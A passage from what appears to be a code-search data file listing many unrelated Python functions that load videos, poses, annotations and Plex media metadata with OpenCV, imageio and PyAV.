self.__save_raw_data_to_csv:\n logging.debug(\"Saving raw data to CSV [%s...\" % self.__RAW_DATA_FILENAME)\n self.__dataframe_videos.to_csv(self.__RAW_DATA_FILENAME, encoding='utf-8', sep=',', index=False)\n self.__dataframe_videos['video_contents'] = self.__dataframe_videos[['video_title', 'video_desc']].\\\n apply(lambda x: \" \".join(x), axis=1)\n\n logging.debug(\"Informative videos data loaded! n=%s\" % self.__dataframe_videos.shape[0])\n\n return self.__dataframe_videos", "def load_video(self, vid_path):\n self.video = cv2.VideoCapture(vid_path)\n self._check_vid_open()\n logging.info('Loaded video at: {}'.format(vid_path))\n return 1", "def _load_data(self, cfg):\n # Load frame trajectories\n if self.cfg.MODEL.USE_TRAJECTORIES:\n if cfg.VIDOR.TEST_DEBUG:\n print('Loading trajectories...')\n with open(os.path.join(cfg.VIDOR.ANNOTATION_DIR, self.trajectories_path), 'r') as f:\n self._trajectories = json.load(f)\n\n # Load human pose features (theta; 72 points)\n if self.cfg.MODEL.USE_HUMAN_POSES:\n if cfg.VIDOR.TEST_DEBUG:\n print('Loading human poses...')\n import pickle\n with open(os.path.join(cfg.VIDOR.ANNOTATION_DIR, self.human_poses_path), 'rb') as f:\n self._human_poses = pickle.load(f)\n elif self.cfg.MODEL.USE_SPA_CONF:\n if cfg.VIDOR.TEST_DEBUG:\n print('Loading human poses for spatial configuration module...')\n self._human_poses_root = os.path.join(cfg.VIDOR.ANNOTATION_DIR, self.human_poses_path)\n\n # Loading frame paths.\n (\n self._image_paths,\n self._video_idx_to_name,\n ) = vidor_helper.load_image_lists(cfg, is_train=(self._split == \"train\"))\n\n # Loading annotations for boxes and labels.\n self._instances = vidor_helper.load_boxes_and_labels(\n cfg, mode=self._split\n )\n\n # Get indices of keyframes and corresponding boxes and labels.\n (\n self._keyframe_indices,\n self._keyframe_boxes_and_labels,\n ) = vidor_helper.get_keyframe_data(cfg, self._instances, mode=self._split)\n\n # import pdb; pdb.set_trace()\n\n # Calculate the number of used boxes.\n self._num_boxes_used = vidor_helper.get_num_boxes_used(\n self._keyframe_indices, self._keyframe_boxes_and_labels\n )\n\n self.print_summary()\n\n def debug(idx):\n pass\n\n if cfg.VIDOR.TEST_DEBUG:\n debug(0)\n # pass", "def _loadData(self, data):\n Movie._loadData(self, data)\n PlexHistory._loadData(self, data)", "def get_data(self):\n global CAM\n while CAM.isOpened():\n _, frame = CAM.read()\n _, jpeg = cv2.imencode('.jpg', frame)\n encoded_img = \"data:image/jpg;base64,\" + str(base64.b64encode(jpeg.tobytes()).decode())\n SIO.emit('video_frame',\n {'frame': encoded_img},\n namespace='/live-stream')\n sleep(self.delay)", "def load_vid_frame(self, ind, camname, preload=True, extension=\".mp4\"):\n fname = (\n str(self._N_VIDEO_FRAMES * int(np.floor(ind / self._N_VIDEO_FRAMES)))\n + extension\n )\n frame_num = int(ind % self._N_VIDEO_FRAMES)\n keyname = os.path.join(camname, fname)\n if preload:\n return self.vidreaders[camname][keyname].get_data(frame_num)\n else:\n thisvid_name = self.vidreaders[camname][keyname]\n abname = thisvid_name.split(\"/\")[-1]\n if abname == self.currvideo_name[camname]:\n vid = self.currvideo[camname]\n else:\n vid = imageio.get_reader(thisvid_name)\n print(\"Loading new video: {} for {}\".format(abname, camname))\n self.currvideo_name[camname] = abname\n # close current vid\n # Without a sleep here, ffmpeg can hang on video close\n time.sleep(0.25)\n if self.currvideo[camname] is not None:\n self.currvideo[camname].close()\n self.currvideo[camname] = vid\n\n im = vid.get_data(frame_num)\n\n return im", "def loadData(path,filename):\n\tfilepath = path + filename\n\ttry:\n\t\t#print('try1')\n\t\twith open(filepath+\".pickle\",\"rb\") as handle:\n\t\t\tallVideoData = pickle.load(handle)\n\t\ttry:\n\t\t\tmetadata = allVideoData[0]\n\t\t\tdata = allVideoData[1]\n\t\texcept:\n\t\t\tmetadata = allVideoData\n\t\t\tdata = __initializeData()\n\t\t\tprint(\"WARNING\")\n\t\t\tprint(\"warning: no data attached to metadata, initializing empty set\")\n\t\t\ttime.sleep(1)\n\t\treturn metadata,data\n\texcept:\n\t\tprint('no file {} exists yet'.format(filepath+\".pickle\"))\n\t\tprint('if writeMetadata has already been used, be sure to save it with saveData()')\n\t\ttime.sleep(1)\n\t\tmetadata = False\n\t\treturn metadata,__initializeData()", "def load_data(self) -> None:", "def _loadData(self, data):\n Video._loadData(self, data)\n Playable._loadData(self, data)\n self.audienceRating = utils.cast(float, data.attrib.get('audienceRating'))\n self.audienceRatingImage = data.attrib.get('audienceRatingImage')\n self.chapters = self.findItems(data, media.Chapter)\n self.chapterSource = data.attrib.get('chapterSource')\n self.collections = self.findItems(data, media.Collection)\n self.contentRating = data.attrib.get('contentRating')\n self.countries = self.findItems(data, media.Country)\n self.directors = self.findItems(data, media.Director)\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.editionTitle = data.attrib.get('editionTitle')\n self.enableCreditsMarkerGeneration = utils.cast(int, data.attrib.get('enableCreditsMarkerGeneration', '-1'))\n self.genres = self.findItems(data, media.Genre)\n self.guids = self.findItems(data, media.Guid)\n self.labels = self.findItems(data, media.Label)\n self.languageOverride = data.attrib.get('languageOverride')\n self.markers = self.findItems(data, media.Marker)\n self.media = self.findItems(data, media.Media)\n self.originallyAvailableAt = utils.toDatetime(data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.originalTitle = data.attrib.get('originalTitle')\n self.primaryExtraKey = data.attrib.get('primaryExtraKey')\n self.producers = self.findItems(data, media.Producer)\n self.rating = utils.cast(float, data.attrib.get('rating'))\n self.ratingImage = data.attrib.get('ratingImage')\n self.ratings = self.findItems(data, media.Rating)\n self.roles = self.findItems(data, media.Role)\n self.similar = self.findItems(data, media.Similar)\n self.studio = data.attrib.get('studio')\n self.tagline = data.attrib.get('tagline')\n self.theme = data.attrib.get('theme')\n self.useOriginalTitle = utils.cast(int, data.attrib.get('useOriginalTitle', '-1'))\n self.viewOffset = utils.cast(int, data.attrib.get('viewOffset', 0))\n self.writers = self.findItems(data, media.Writer)\n self.year = utils.cast(int, data.attrib.get('year'))", "def load(self) -> None:\n self._load_data()\n self._load_poses()\n self._load_timestamps()", "def LoadAirplane():\n return vtkInterface.PolyData(planefile)", "def _loadData(self, data):\n Video._loadData(self, data)\n self.audienceRating = utils.cast(float, data.attrib.get('audienceRating'))\n self.audienceRatingImage = data.attrib.get('audienceRatingImage')\n self.audioLanguage = data.attrib.get('audioLanguage', '')\n self.autoDeletionItemPolicyUnwatchedLibrary = utils.cast(\n int, data.attrib.get('autoDeletionItemPolicyUnwatchedLibrary', '0'))\n self.autoDeletionItemPolicyWatchedLibrary = utils.cast(\n int, data.attrib.get('autoDeletionItemPolicyWatchedLibrary', '0'))\n self.childCount = utils.cast(int, data.attrib.get('childCount'))\n self.collections = self.findItems(data, media.Collection)\n self.contentRating = data.attrib.get('contentRating')\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.enableCreditsMarkerGeneration = utils.cast(int, data.attrib.get('enableCreditsMarkerGeneration', '-1'))\n self.episodeSort = utils.cast(int, data.attrib.get('episodeSort', '-1'))\n self.flattenSeasons = utils.cast(int, data.attrib.get('flattenSeasons', '-1'))\n self.genres = self.findItems(data, media.Genre)\n self.guids = self.findItems(data, media.Guid)\n self.index = utils.cast(int, data.attrib.get('index'))\n self.key = self.key.replace('/children', '') # FIX_BUG_50\n self.labels = self.findItems(data, media.Label)\n self.languageOverride = data.attrib.get('languageOverride')\n self.leafCount = utils.cast(int, data.attrib.get('leafCount'))\n self.locations = self.listAttrs(data, 'path', etag='Location')\n self.network = data.attrib.get('network')\n self.originallyAvailableAt = utils.toDatetime(data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.originalTitle = data.attrib.get('originalTitle')\n self.rating = utils.cast(float, data.attrib.get('rating'))\n self.ratings = self.findItems(data, media.Rating)\n self.roles = self.findItems(data, media.Role)\n self.seasonCount = utils.cast(int, data.attrib.get('seasonCount', self.childCount))\n self.showOrdering = data.attrib.get('showOrdering')\n self.similar = self.findItems(data, media.Similar)\n self.studio = data.attrib.get('studio')\n self.subtitleLanguage = data.attrib.get('audioLanguage', '')\n self.subtitleMode = utils.cast(int, data.attrib.get('subtitleMode', '-1'))\n self.tagline = data.attrib.get('tagline')\n self.theme = data.attrib.get('theme')\n self.useOriginalTitle = utils.cast(int, data.attrib.get('useOriginalTitle', '-1'))\n self.viewedLeafCount = utils.cast(int, data.attrib.get('viewedLeafCount'))\n self.year = utils.cast(int, data.attrib.get('year'))", "def _loadData(self, data):\n Clip._loadData(self, data)\n PlexSession._loadData(self, data)", "def load_poses(self):\n print('Loading poses for sequence ' + self.sequence + '...')\n\n pose_file = os.path.join(self.pose_path, self.sequence + '.txt')\n\n # Read and parse the poses\n try:\n self.T_w_cam0 = []\n with open(pose_file, 'r') as f:\n for line in f.readlines():\n T = np.fromstring(line, dtype=float, sep=' ')\n T = T.reshape(3, 4)\n T = np.vstack((T, [0, 0, 0, 1]))\n self.T_w_cam0.append(T)\n print('done.')\n\n except FileNotFoundError:\n print('Ground truth poses are not avaialble for sequence ' +\n self.sequence + '.')", "def load_video(self):\n self.video_file = tkFileDialog.askopenfilename()\n self.video_parser = VideoFileParser(self.video_file)\n\n self.video_entries = self.video_parser.entries\n\n for index, entry in enumerate(self.video_entries):\n self.video_box.insert(index, entry.word)", "def _loadData(self, data):\n Episode._loadData(self, data)\n PlexHistory._loadData(self, data)", "def loadVideo(self,path,loadAudio=True):\r\n self.aud_path = \"\"\r\n # Get cv2 video capture object\r\n self.vid_path = path\r\n self.vid = cv2.VideoCapture(self.vid_path)\r\n self.delay = int(1000/self.vid.get(cv2.CAP_PROP_FPS))\r\n self.vid_len = int(self.vid.get(cv2.CAP_PROP_FRAME_COUNT))/self.vid.get(cv2.CAP_PROP_FPS)\r\n self.state = VideoPlayer.State.STOPPED\r\n self.hasAudio = True# If no audio in video, ignore audio\r\n if loadAudio:\r\n self.loadAudio(self.vid_path)\r\n else:\r\n self.loadCachedAudio()", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n frame_dir = video_info['filename']\n video_info['filename'] = osp.join(self.data_prefix, video_info['filename'])\n video_info['frame_dir'] = frame_dir\n video_info['index'] = i\n \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n\n return video_infos", "def load_video_data(fpath):\n videos = []\n with open(fpath) as f:\n d1 = json.load(f)['items']\n videos += append_videos(d1)\n return videos", "def _loadData(self, data):\n Video._loadData(self, data)\n Playable._loadData(self, data)\n self._seasonNumber = None # cached season number\n self.audienceRating = utils.cast(float, data.attrib.get('audienceRating'))\n self.audienceRatingImage = data.attrib.get('audienceRatingImage')\n self.chapters = self.findItems(data, media.Chapter)\n self.chapterSource = data.attrib.get('chapterSource')\n self.collections = self.findItems(data, media.Collection)\n self.contentRating = data.attrib.get('contentRating')\n self.directors = self.findItems(data, media.Director)\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.grandparentArt = data.attrib.get('grandparentArt')\n self.grandparentGuid = data.attrib.get('grandparentGuid')\n self.grandparentKey = data.attrib.get('grandparentKey')\n self.grandparentRatingKey = utils.cast(int, data.attrib.get('grandparentRatingKey'))\n self.grandparentTheme = data.attrib.get('grandparentTheme')\n self.grandparentThumb = data.attrib.get('grandparentThumb')\n self.grandparentTitle = data.attrib.get('grandparentTitle')\n self.guids = self.findItems(data, media.Guid)\n self.index = utils.cast(int, data.attrib.get('index'))\n self.labels = self.findItems(data, media.Label)\n self.markers = self.findItems(data, media.Marker)\n self.media = self.findItems(data, media.Media)\n self.originallyAvailableAt = utils.toDatetime(data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.parentGuid = data.attrib.get('parentGuid')\n self.parentIndex = utils.cast(int, data.attrib.get('parentIndex'))\n self.parentKey = data.attrib.get('parentKey')\n self.parentRatingKey = utils.cast(int, data.attrib.get('parentRatingKey'))\n self.parentThumb = data.attrib.get('parentThumb')\n self.parentTitle = data.attrib.get('parentTitle')\n self.parentYear = utils.cast(int, data.attrib.get('parentYear'))\n self.producers = self.findItems(data, media.Producer)\n self.rating = utils.cast(float, data.attrib.get('rating'))\n self.ratings = self.findItems(data, media.Rating)\n self.roles = self.findItems(data, media.Role)\n self.skipParent = utils.cast(bool, data.attrib.get('skipParent', '0'))\n self.viewOffset = utils.cast(int, data.attrib.get('viewOffset', 0))\n self.writers = self.findItems(data, media.Writer)\n self.year = utils.cast(int, data.attrib.get('year'))\n\n # If seasons are hidden, parentKey and parentRatingKey are missing from the XML response.\n # https://forums.plex.tv/t/parentratingkey-not-in-episode-xml-when-seasons-are-hidden/300553\n if self.skipParent and data.attrib.get('parentRatingKey') is None:\n # Parse the parentRatingKey from the parentThumb\n if self.parentThumb and self.parentThumb.startswith('/library/metadata/'):\n self.parentRatingKey = utils.cast(int, self.parentThumb.split('/')[3])\n # Get the parentRatingKey from the season's ratingKey\n if not self.parentRatingKey and self.grandparentRatingKey:\n self.parentRatingKey = self.show().season(season=self.parentIndex).ratingKey\n if self.parentRatingKey:\n self.parentKey = f'/library/metadata/{self.parentRatingKey}'", "def process_video(self):\n if os.path.isfile(self.source):\n self.cap = cv2.VideoCapture(self.source)\n else:\n try:\n file_name = \"input.mp4\"\n self.source = self.source.replace('open', 'uc')\n print( \"\\nDownloading video file from drive link to %s\\n\"%file_name)\n gdown.download(self.source, file_name, quiet=False)\n print( \"%s downloaded!\\n\"%file_name )\n self.cap = cv2.VideoCapture(file_name)\n except Exception:\n raise RuntimeError(\"Invalid source input, please specify a Google drive link or a downloaded local file as input \\n\")\n\n\n assert self.cap.isOpened(), \"Failed to open %s\" % self.source\n\n self.w = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n self.h = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n self.fps = self.cap.get(cv2.CAP_PROP_FPS) \n self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))\n return", "def load_data(self):", "def video_config(FILENAME):\n\n\tcap = cv2.VideoCapture(FILENAME)\n\twhile not cap.isOpened():\n\t cap = cv2.VideoCapture(FILENAME)\n\t cv2.waitKey(1000)\n\t print \"Wait for the header\"\n\tpos_frame = cap.get(cv2.cv.CV_CAP_PROP_POS_FRAMES)\n\t\n\treturn cap, pos_frame", "def load_pose(color_dir, view, depth_scale, device):\n pose_file = os.path.join(color_dir, '%05d.pose' % view)\n if os.path.exists(pose_file):\n with open(pose_file, \"rb\") as fh:\n pose = pickle.load(fh)\n pose[:3,3:] *= depth_scale\n pose = torch.tensor(\n np.concatenate(\n (pose, np.array([0, 0, 0, 1]).reshape(1, 4)),\n axis=0\n ),\n dtype=torch.float32,\n device=device,\n )\n else:\n error(\"Pose file '%s' does not exist.\" % pose_file)\n return pose", "def get_video_data(self):\n\t\tfeature_str = 'fdhh' if self.fdhh else 'pca'\n\t\tif self.options.mode == 'test':\n\t\t\tfeature_path = (f'{self.feature_folder}_FD', f'train_test_{feature_str}.pic')\n\t\telse:\n\t\t\tfeature_path = (f'{self.feature_folder}_FD', f'train_dev_{feature_str}.pic')\n\t\t\t\n\t\t# Return saved features if exist:\n\t\tif not self.options.save_features and os.path.exists(f'{feature_path[0]}/{feature_path[1]}'):\n\t\t\tX_train, X_test = load_from_file(f'{feature_path[0]}/{feature_path[1]}')\n\t\telse:\n\t\t\tX_train, X_test = self.get_train_test()\n\t\t\t'''X_train, X_test = scale(X_train, X_test, scale_type='standard', axis=0, use_boxcox=True, boxcox_axis=0,\n\t\t\t use_pandas=True, verbose=self.options.verbose)'''\n\t\t\tX_train, X_test = scale(X_train, X_test, scale_type='minmax', axis=0, use_pandas=True,\n\t\t\t verbose=self.options.verbose)\n\t\t\tif self.fdhh:\n\t\t\t\tif self.options.verbose:\n\t\t\t\t\tprint('Performing FDHH over train and test set...')\n\t\t\t\tX_train = X_train.groupby(level=0).apply(self.FDHH)\n\t\t\t\tX_test = X_test.groupby(level=0).apply(self.FDHH)\n\t\t\t\tif self.options.verbose:\n\t\t\t\t\tprint(f'Sparsity in Train fdhh = {np.sum(X_train.values == 0) / X_train.size}')\n\t\t\t\t\tprint(f'Sparsity in Test fdhh = {np.sum(X_test.values == 0) / X_test.size}')\n\t\t\telse:\n\t\t\t\tX_train, X_test = self.video_pca(X_train, X_test)\n\t\t\t\t\n\t\tif self.options.save_features:\n\t\t\tsave_to_file(feature_path[0], feature_path[1], (X_train, X_test))\n\t\t\tself.options.save_features = False\n\t\t\n\t\tif not self.fdhh:\n\t\t\tX_train = self.split_videos(X_train)\n\t\t\tX_test = self.split_videos(X_test)\n\t\t\t\n\t\treturn [X_train, X_test]", "def openVideo(self):\n fname = self.openFile(self.user[\"Video\"])\n if fname != \"\":\n error_opening_video = False\n\n cam = cv2.VideoCapture(fname)\n logging.info(\"Opening video Check: {0}\".format(fname))\n\n currentframe = 0\n ret, frame = cam.read()\n\n if ret is False:\n error_opening_video = True\n # Release all space and windows once done\n cam.release()\n cv2.destroyAllWindows()\n\n if error_opening_video:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n msg.setText(\"Error on opening the video: {0}\".format(fname))\n msg.setWindowTitle(\"Information\")\n msg.setStandardButtons(QMessageBox.Ok)\n msg.exec_()\n else:\n self.user[\"Video\"] = fname\n name = self.splitPath(fname)[-1]\n self.vid_name = name.split(\".\")[0]\n self.ui.l_vid.setText(\"Load: \" + self.vid_name)\n self.checkFiles()", "def init_video(self):\n\n assert self.container is None\n\n retry = 3\n while self.container is None and 0 < retry:\n retry -= 1\n try:\n self.container = av.open(self.tello.get_video_stream())\n except av.AVError as ave:\n print(ave)\n print('retry...')\n\n\n assert self.container is not None", "def load(self):\n if self.ref == None:\n self.ref = av.open(self.abspath)\n self.n_audio_streams = len([s for s in self.ref.streams if s.type == 'audio'])\n self.n_video_streams = len([s for s in self.ref.streams if s.type == 'video'])\n if self.n_audio_streams > 0:\n self.media_types += ['audio']\n if self.n_video_streams > 0:\n self.media_types += ['video']\n self.duration = self.ref.duration / self.AV_TIME_BASE", "def parse():\n all_players = list(FACE_IMAGE_LOCATIONS.keys())\n face_encodings = VideoParser.__load_faces_encodings(all_players)\n player_occurrences = VideoParser.__get_player_occurrences(all_players, face_encodings)\n VideoParser.__save_parsed_video(player_occurrences)", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']+'.avi') \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 if 'answer_idx' not in video_info else video_info['answer_idx']\n\n if isinstance(video_info['text'], str):\n video_info['text'] = [video_info['text']] \n else:\n if not self.test_ret:\n video_info['text'] = [rnd.choice(video_info['text'])]\n else:\n video_info['clip_text_candidate'] = list(range(len(video_info['text'])))\n\n video_infos.append(video_info) \n del ann_info\n\n return video_infos", "def _loadData(self, data):\n Video._loadData(self, data)\n self.audioLanguage = data.attrib.get('audioLanguage', '')\n self.collections = self.findItems(data, media.Collection)\n self.guids = self.findItems(data, media.Guid)\n self.index = utils.cast(int, data.attrib.get('index'))\n self.key = self.key.replace('/children', '') # FIX_BUG_50\n self.labels = self.findItems(data, media.Label)\n self.leafCount = utils.cast(int, data.attrib.get('leafCount'))\n self.parentGuid = data.attrib.get('parentGuid')\n self.parentIndex = utils.cast(int, data.attrib.get('parentIndex'))\n self.parentKey = data.attrib.get('parentKey')\n self.parentRatingKey = utils.cast(int, data.attrib.get('parentRatingKey'))\n self.parentStudio = data.attrib.get('parentStudio')\n self.parentTheme = data.attrib.get('parentTheme')\n self.parentThumb = data.attrib.get('parentThumb')\n self.parentTitle = data.attrib.get('parentTitle')\n self.ratings = self.findItems(data, media.Rating)\n self.subtitleLanguage = data.attrib.get('audioLanguage', '')\n self.subtitleMode = utils.cast(int, data.attrib.get('subtitleMode', '-1'))\n self.viewedLeafCount = utils.cast(int, data.attrib.get('viewedLeafCount'))\n self.year = utils.cast(int, data.attrib.get('year'))", "def __init__(self, videoPath=\"\", cacheString=\"-cache\", faceDetector=None):\n self.videoPath = videoPath\n self.cacheString = cacheString\n self.video = None \n self.currentFrame = []\n self.currentFrameNumber = 0\n self.frameCount = 0 #total frame number\n self.fps = 25\n self.ret = True #if the video is over\n self.isPlaying = False\n self.ifDrawAxis = False\n self.ifDrawSquare = False\n self.cacheData = {}\n \n if videoPath != \"\":\n self.load()", "def load(self):\n Logger.info(\"VLCPlayer: Entering load\")\n self._load_player(self.source)\n self._set_volume(self.volume)", "def testLoadData(self):\n data = load_covid_data(file)\n assert type(data).__name__ == 'dict'", "def _read_file(self):\n extension = self.path.split('.')[-1]\n if extension!='avi':\n raise Exception(\"Invalid Format\")\n\n return cv2.VideoCapture(self.path)", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']) \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n return video_infos", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']) \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n return video_infos", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n data = hload_pkl(self.ann_file)\n\n video_infos = []\n for video_info in data:\n filename = video_info['filename']\n if self.data_prefix is not None:\n filename = osp.join(self.data_prefix, filename)\n video_info['filename'] = filename\n label = video_info['label']\n if self.multi_class and isinstance(label, np.ndarray):\n video_info['label'] = label.astype(np.float32)\n\n video_infos.append(video_info)\n\n while len(video_infos) < self.min_video_num:\n left_num = min(self.min_video_num - len(video_infos), len(video_infos))\n video_infos.extend(random.sample(video_infos, left_num))\n return video_infos", "def loadVideo(self,path,loadAudio=False):\r\n self.videoPlayer.loadVideo(path,loadAudio=loadAudio)\r\n self.videoPath = path", "def loadData():\n\tprint \"Loading POS vectorized reviews\"\n\twith open(DATA_PATH, \"rb\") as data_file:\n\t\tdata = cPickle.load(data_file)\n\treturn data", "def get_camera_data_object(evt, src):\n o = evt.get(_psana.Camera.FrameV1, src)\n if o is not None: return o\n\n return None", "def open_video(self):\n\n # start the stream on the bebop\n if (self.is_bebop):\n self.drone_object.start_video_stream()\n\n # we have bypassed the old opencv VideoCapture method because it was unreliable for rtsp\n\n # get the path for the config files\n fullPath = inspect.getfile(DroneVisionGUI)\n shortPathIndex = fullPath.rfind(\"/\")\n if (shortPathIndex == -1):\n # handle Windows paths\n shortPathIndex = fullPath.rfind(\"\\\\\")\n print(shortPathIndex)\n shortPath = fullPath[0:shortPathIndex]\n self.imagePath = join(shortPath, \"images\")\n self.utilPath = join(shortPath, \"utils\")\n print(self.imagePath)\n print(self.utilPath)\n\n if self.is_bebop:\n # generate the streaming-address for the Bebop\n self.utilPath = join(shortPath, \"utils\")\n self.stream_adress = \"%s/bebop.sdp\" % self.utilPath\n else:\n # generate the streaming-address for the Mambo\n self.stream_adress = \"rtsp://192.168.99.1/media/stream2\"\n\n # initialise the vlc-player with the network-caching\n self.player = vlc.MediaPlayer(self.stream_adress, \":network-caching=\" + str(self.network_caching))\n\n # start the buffering\n success = self._start_video_buffering()", "def video_handle_for_demo():\n frame = cv2.imread(\"vision.png\")\n\n return frame", "def __init__(self, data, video_stream_url_provider):\n self._camera_id = data['id']\n self._name = data['name']\n self._is_enabled = data['enabled']\n self._recording_status = data['recStatus']\n self._video_stream_url = video_stream_url_provider(self.camera_id)", "def load_image_or_video(self):\n if self.guiParam['appType'] == 'Image Applications':\n self.data = self.load_image_source()\n\n else:\n raise ValueError(\n '[Error] Please select of the two Application pipelines')\n\n return self.data", "def get_session_videodata(videos):\n # Get first frame of first video for future processing and number of frames in each video\n videos_data = {'Frame rate': [], 'Number frames': []}\n for idx, videofile in enumerate(videos):\n cap = cv2.VideoCapture(videofile)\n videos_data['Frame rate'].append(cap.get(cv2.CAP_PROP_FPS))\n videos_data['Number frames'].append(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)))\n videos_data['Cumu. Num Frames'] = np.cumsum(videos_data['Number frames'])\n return videos_data", "def get_video_data(video_page_url):\n\tvideo_data = {}\n\tresponse = requests.get(video_page_url)\n\tsoup = bs4.BeautifulSoup(response.text)\n\tvideo_data['title'] = soup.select('title')[0].get_text()\n\t\n\t# careful with the encoding: otherwise it might fail on title like \"Dr med Schr(umlaut)fel Interview\" \n\t#print(u'\"{0}\"'.format(video_data['title']).encode('ascii', 'ignore'))\n\t\n\t# sometimes views are like \"42 views\" or \"2457\" with even CR/LF\n\ttry:\n\t\tvideo_data['views'] = int(re.sub('[^0-9]', '',\n\t soup.select('.watch-view-count')[0].get_text().split()[0]))\n\texcept:\n\t\t#print(\"Error fetching the view count for %s\" % video_data['title'].encode('ascii', 'ignore'))\n\t\tvideo_data['views'] = 0\n\n\t# sometimes likes / dislikes can be disabled...\n\tif soup.select('.likes-count'):\n\t\tvideo_data['likes'] = int(re.sub('[^0-9]', '',\n\t soup.select('.likes-count')[0].get_text().split()[0]))\n\t\tvideo_data['dislikes'] = int(re.sub('[^0-9]', '', \n\t soup.select('.dislikes-count')[0].get_text().split()[0]))\n\telse:\n\t\t#print(\"likes/dislikes not authorized for the video: %s\" % video_data['title'].encode('ascii', 'ignore'))\n\t\tvideo_data['likes'] = 0\n\t\tvideo_data['dislikes'] = 0\n\n\treturn video_data", "def load_stream_data(test_path, test_file=0):\n left_video_file = os.path.join(test_path + '/left_{:02d}.avi'.format(test_file))\n right_video_file = os.path.join(test_path + '/right_{:02d}.avi'.format(test_file))\n left_annotations_dir = os.path.join(test_path + '/left_{:02d}_json/*'.format(test_file))\n right_annotations_dir = os.path.join(test_path + '/right_{:02d}_json/*'.format(test_file))\n\n left_annotations = sorted(glob(left_annotations_dir))\n right_annotations = sorted(glob(right_annotations_dir))\n\n return left_video_file, right_video_file, left_annotations, right_annotations", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n info_dict = {} \n info_dict['filename'] = video_info['vid_name'] if 'filename' not in video_info else video_info['filename']\n frame_dir = info_dict['filename']\n info_dict['frame_dir'] = frame_dir\n info_dict['index'] = i\n info_dict['label'] = video_info['answer_idx']\n info_dict['answers'] = video_info['answers'] if 'answers' in video_info else video_info['text']\n info_dict['question'] = video_info['question'] if 'question' in video_info else \"\"\n video_infos.append(info_dict) \n del ann_info\n\n return video_infos", "def load_video(self, filename):\n \n reader = imageio.get_reader(filename, 'ffmpeg')\n \n return np.array(list(reader), dtype=np.float32)", "def readVideo(self):\n vid = cv2.VideoCapture(self.fname)\n imgstack = []\n # grab = True\n grab, img = vid.read()\n while grab:\n imgstack.append(\n Frame(\n cv2.cvtColor(img, cv2.COLOR_BGR2GRAY),\n self.starttime\n + datetime.timedelta(seconds=self.frame_dt * self.length),\n )\n )\n self.length += 1\n grab, img = vid.read()\n self.frames = imgstack", "def load_video(video_path, dim):\n videogen = skvideo.io.vreader(video_path)\n vid_data = []\n for frame in videogen:\n try:\n vid_data.append(scipy.misc.imresize(frame, dim))\n except:\n print len(vid_data)\n return np.array(vid_data)", "def generateDataFromVideo(path):\n video = cv2.VideoCapture(path)\n success, frame = video.read()\n cnt = 1\n wiperExist = 0\n file = open(file='annotation.txt', mode='w')\n\n while success:\n cv2.imwrite(filename='./data/{0}.jpg'.format(cnt), img=frame)\n cnt += 1\n success, frame = video.read()\n if (cnt - 4) % 37 == 0 or (wiperExist > 0):\n wiperExist = (wiperExist + 1) % 21\n file.write('./Dataset/data/{0}.jpg 1\\n'.format(cnt))\n else:\n file.write('./Dataset/data/{0}.jpg 0\\n'.format(cnt))", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n info_dict = {} \n info_dict['filename'] = video_info['vid_name']\n frame_dir = info_dict['filename']\n info_dict['frame_dir'] = frame_dir\n info_dict['index'] = i\n info_dict['label'] = video_info['answer_idx']\n info_dict['answers'] = video_info['answers']\n info_dict['question'] = video_info['q']\n info_dict['subtitle'] = video_info['located_sub_text']\n info_dict['frame_ind'] = video_info['located_frame']\n info_dict['total_frames'] = video_info.get('total_frames', -1)\n video_infos.append(info_dict) \n del ann_info\n\n return video_infos", "def from_local(self):\n if self.local_annotations_filename is not None:\n with open(self.local_annotations_filename, 'r') as f:\n data = json.load(f)\n self.video_annotations = dl.AnnotationCollection.from_json(data['annotations'])", "def load_movie_trailer(self):\n self.trailer_youtube_url = tmdb.tmdb_client().get_movie_trailer_url(self.tmdb_id)", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n if isinstance(video_info['text'], str):\n video_info['text'] = [video_info['text']]\n for text in video_info['text']:\n info = {}\n frame_dir = video_info['filename']\n filename = osp.join(self.data_prefix, video_info['filename']+'.mp4') \n info['filename'] = filename\n 